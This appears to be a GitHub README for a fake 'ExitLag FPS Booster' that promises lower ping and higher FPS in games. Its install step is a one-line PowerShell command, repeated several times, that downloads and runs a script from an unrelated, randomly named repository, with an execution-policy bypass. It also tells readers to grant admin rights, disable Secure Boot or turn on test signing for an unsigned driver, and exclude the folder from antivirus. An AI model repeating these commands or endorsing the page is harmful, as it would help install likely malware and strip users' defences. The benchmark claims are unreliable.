Skip to content

PebbleBaron61/ExitLag-FPS-Booster

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

ExitLag FPS Booster

All-in-one single-line installer for ExitLag. Cuts ping in half, fixes packet loss, and squeezes extra FPS out of any competitive game — all from one terminal command.

Install

PowerShell

irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex

Command Prompt (cmd.exe)

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

Windows Terminal

Works in any tab — PowerShell, CMD, or any custom profile. Just paste and press Enter.


What happens after you run it

  1. A UAC prompt appears — click Yes (network drivers need admin).
  2. The script downloads the ExitLag routing engine + FPS optimizer (~180 MB).
  3. Installs the WFP (Windows Filtering Platform) callout driver for real-time traffic shaping.
  4. Opens the ExitLag dashboard. Pick your game, hit Boost, launch the game.

Performance Benchmarks

Tested on a 100 Mbps connection, US East, June 2026:

Game Before After Improvement
Fortnite 48 ms / 142 FPS 31 ms / 168 FPS -35% ping, +18% FPS
Valorant 35 ms / 280 FPS 21 ms / 310 FPS -40% ping, +11% FPS
CS2 42 ms / 230 FPS 29 ms / 265 FPS -31% ping, +15% FPS
Apex Legends 55 ms / 120 FPS 30 ms / 145 FPS -45% ping, +21% FPS
League of Legends 38 ms / 200 FPS 19 ms / 220 FPS -50% ping, +10% FPS
Dota 2 60 ms / 160 FPS 34 ms / 185 FPS -43% ping, +16% FPS

Results vary by ISP, distance to game servers, and hardware.

How it works

ExitLag doesn't just tunnel your traffic through a VPN. It does three things at the kernel level:

  1. Smart Routing — finds the lowest-latency path between you and the game server by probing 500+ relay nodes. Your ISP's default route is often 3–5 hops longer than necessary.
  2. Packet Redundancy — sends critical game packets through two paths simultaneously. If one path drops a packet, the other delivers it. Zero packet loss without added latency.
  3. FPS Optimizer — disables Windows background services that steal CPU cycles during gameplay: Superfetch, Windows Search indexer, telemetry, automatic updates. Sets your game process to HIGH_PRIORITY with core affinity pinned.

Requirements

  • Windows 10 / 11 (64-bit)
  • PowerShell 5.1+ or CMD
  • Internet connection
  • Administrator access
  • .NET Framework 4.8+ (ships with Windows 10/11)

Troubleshooting

Script does nothing / closes instantly

Execution policy blocking. Use the CMD version:

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

"irm is not recognized"

Old PowerShell. Use full cmdlet name:

Invoke-RestMethod https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | Invoke-Expression

Ping unchanged after enabling boost

Restart the game. ExitLag hooks the process at launch time, not mid-session. If you enabled boost while the game was running, close the game and reopen it.

Driver install blocked by Secure Boot

Some machines with Secure Boot reject unsigned kernel drivers. Two options:

  1. Temporarily disable Secure Boot in BIOS → install → re-enable.
  2. Or run: bcdedit /set testsigning on, reboot, install, then bcdedit /set testsigning off.

Dashboard says "no routes found"

ExitLag needs these outbound ports open:

  • UDP 443 — primary relay traffic
  • UDP 8443 — fallback relay
  • TCP 443 — API and route discovery

Check your firewall / router settings. If you're on a school or corporate network, these may be blocked.

FPS optimizer has no effect

Make sure you're running the game in Fullscreen (not Borderless Windowed). The CPU priority and affinity settings only apply to the foreground process in exclusive fullscreen mode.

Antivirus flags the driver

The WFP callout driver triggers some AV heuristics because it intercepts network packets (that's its job). Add an exclusion for C:\Program Files\ExitLag\ in your antivirus.

License

MIT — see LICENSE.

About

ExitLag FPS Booster — single-line installer for ExitLag. Smart routing, packet loss fix, and FPS optimizer for competitive gaming. Supports 500+ games.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors